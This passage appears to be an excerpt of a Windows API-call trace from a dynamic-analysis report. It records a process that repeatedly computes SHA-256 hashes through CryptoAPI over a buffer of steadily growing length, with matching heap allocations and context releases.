	[0214.648] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.648] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.648] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.649] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.649] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0214.649] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.649] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734e70
	[0214.649] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734e70, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734e70, pdwDataLen=0x128ba4) returned 1
	[0214.649] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.649] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.649] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.649] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.649] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0214.650] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.650] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734e98
	[0214.650] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734e98, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734e98, pdwDataLen=0x128ba4) returned 1
	[0214.650] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.650] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.650] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.650] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.650] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0214.650] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.650] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734ec0
	[0214.650] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734ec0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734ec0, pdwDataLen=0x128ba4) returned 1
	[0214.650] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.650] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.650] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.651] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.651] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0214.651] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.651] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734ee8
	[0214.651] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734ee8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734ee8, pdwDataLen=0x128ba4) returned 1
	[0214.651] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.651] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.651] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.651] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.651] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0214.651] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.651] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734f10
	[0214.651] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734f10, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734f10, pdwDataLen=0x128ba4) returned 1
	[0214.651] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.651] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.651] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.652] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.652] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0214.652] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.652] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734f38
	[0214.652] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734f38, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734f38, pdwDataLen=0x128ba4) returned 1
	[0214.652] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.652] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.652] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.652] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.652] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0214.652] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.652] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734f60
	[0214.652] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734f60, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734f60, pdwDataLen=0x128ba4) returned 1
	[0214.652] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.652] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.652] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.653] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.653] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0214.653] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.653] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734f88
	[0214.653] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734f88, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734f88, pdwDataLen=0x128ba4) returned 1
	[0214.653] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.653] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.653] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.653] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.653] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0214.653] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.653] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734fb0
	[0214.653] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734fb0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734fb0, pdwDataLen=0x128ba4) returned 1
	[0214.653] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.653] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.654] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.654] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.654] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0214.654] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.654] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734fd8
	[0214.654] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734fd8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734fd8, pdwDataLen=0x128ba4) returned 1
	[0214.654] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.654] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.654] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.654] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.654] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0214.655] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.655] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735000
	[0214.655] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2735000, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735000, pdwDataLen=0x128ba4) returned 1
	[0214.655] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.655] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.655] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.655] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.655] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0214.655] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.655] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735028
	[0214.655] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2735028, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735028, pdwDataLen=0x128ba4) returned 1
	[0214.655] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.655] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.655] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.656] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.656] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0214.656] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.656] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735050
	[0214.656] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2735050, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735050, pdwDataLen=0x128ba4) returned 1
	[0214.656] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.656] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.656] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.657] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.657] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0214.657] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.657] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735078
	[0214.657] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2735078, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735078, pdwDataLen=0x128ba4) returned 1
	[0214.657] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.657] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.657] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.658] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.658] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0214.658] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.658] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27350a0
	[0214.658] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27350a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27350a0, pdwDataLen=0x128ba4) returned 1
	[0214.658] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.658] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.658] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.658] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.658] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0214.658] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.658] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27350c8
	[0214.658] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27350c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27350c8, pdwDataLen=0x128ba4) returned 1
	[0214.658] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.658] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.659] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.659] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.659] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0214.659] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.659] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27350f0
	[0214.659] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27350f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27350f0, pdwDataLen=0x128ba4) returned 1
	[0214.659] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.659] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.659] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.659] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.659] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0214.660] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.660] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735118
	[0214.660] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2735118, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735118, pdwDataLen=0x128ba4) returned 1
	[0214.660] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.660] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.660] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.660] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.660] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0214.660] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.660] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735140
	[0214.660] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2735140, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735140, pdwDataLen=0x128ba4) returned 1
	[0214.660] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.660] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.660] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.661] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.661] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0214.661] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.661] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735168
	[0214.661] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2735168, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735168, pdwDataLen=0x128ba4) returned 1
	[0214.661] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.661] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.661] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.661] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.661] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0214.661] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.661] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735190
	[0214.661] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2735190, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735190, pdwDataLen=0x128ba4) returned 1
	[0214.661] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.661] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.661] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.662] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.662] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0214.662] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.662] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27351b8
	[0214.662] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27351b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27351b8, pdwDataLen=0x128ba4) returned 1
	[0214.662] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.662] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.662] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.662] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.662] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0214.662] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.662] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27351e0
	[0214.663] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27351e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27351e0, pdwDataLen=0x128ba4) returned 1
	[0214.663] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.663] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.663] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.663] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.663] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0214.663] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.663] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735208
	[0214.663] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2735208, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735208, pdwDataLen=0x128ba4) returned 1
	[0214.663] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.663] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.663] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.664] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.664] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0214.664] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.664] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735230
	[0214.664] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2735230, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735230, pdwDataLen=0x128ba4) returned 1
	[0214.664] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.664] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
